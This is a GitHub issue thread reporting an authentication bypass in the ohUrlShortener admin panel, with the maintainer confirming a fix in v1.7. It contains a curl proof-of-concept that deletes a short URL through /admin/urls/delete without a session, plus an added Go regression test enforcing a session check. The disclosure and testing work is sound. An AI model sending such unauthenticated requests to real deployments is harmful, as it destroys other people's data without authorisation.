Closed douglas-oliveira-tc closed 2 years ago
I'll check for this issue, TODAY.
Turns out, it was my bad. Sorry about it.
Already fixed this issue and drafted a new release: https://github.com/barats/ohUrlShortener/releases/tag/v1.7
That's great, thanks a lot!
I should thank you for reporting this issue.
I was implementing your project for internal experimentation and found a critical issue that allows unauthenticated users to bypass auth controls.
Steps to reproduce:
curl -i -s -k -X $'POST' -H $'Host: admin.ohUrlShortener.com' -H $'Referer: http://admin.ohUrlShortener.com/admin/urls' -H $'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' -H $'Content-Length: 18' --data-binary $'short_url=Ak3vaj58' $'http://admin.ohUrlShortener.com/admin/urls/delete'
All examples were run in my environment; the address used is only for illustration purposes.
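A regression check for the behaviour reported above, added here as an example and not taken from ohUrlShortener's code or its v1.7 fix: the session check wraps the whole `/admin/` subtree, and the reported request is replayed with and without a session. The cookie name `session`, the in-memory session store, and the helper names are assumptions made for the sketch.

```go
package main

import (
	"fmt"
	"net/http"
	"net/http/httptest"
	"strings"
)

// Constructed session store; the project's real session handling is not shown on this page.
var validSessions = map[string]bool{"constructed-session-id": true}

// requireSession rejects any request that lacks a known session cookie.
func requireSession(next http.Handler) http.Handler {
	return http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
		c, err := r.Cookie("session") // cookie name is an assumption
		if err != nil || !validSessions[c.Value] {
			http.Error(w, "unauthorized", http.StatusUnauthorized)
			return
		}
		next.ServeHTTP(w, r)
	})
}

// newAdminMux guards the entire /admin/ prefix, so a route added later
// cannot be registered without the check.
func newAdminMux() http.Handler {
	admin := http.NewServeMux()
	admin.HandleFunc("/admin/urls/delete", func(w http.ResponseWriter, r *http.Request) {
		fmt.Fprint(w, "deleted") // stand-in for the real delete handler
	})
	root := http.NewServeMux()
	root.Handle("/admin/", requireSession(admin))
	return root
}

// deleteStatus replays the reported request shape and returns the HTTP status.
func deleteStatus(h http.Handler, session string) int {
	req := httptest.NewRequest(http.MethodPost, "/admin/urls/delete",
		strings.NewReader("short_url=Ak3vaj58"))
	req.Header.Set("Content-Type", "application/x-www-form-urlencoded; charset=UTF-8")
	if session != "" {
		req.AddCookie(&http.Cookie{Name: "session", Value: session})
	}
	rec := httptest.NewRecorder()
	h.ServeHTTP(rec, req)
	return rec.Code
}

func main() {
	h := newAdminMux()
	fmt.Println(deleteStatus(h, ""), deleteStatus(h, "constructed-session-id"))
}
```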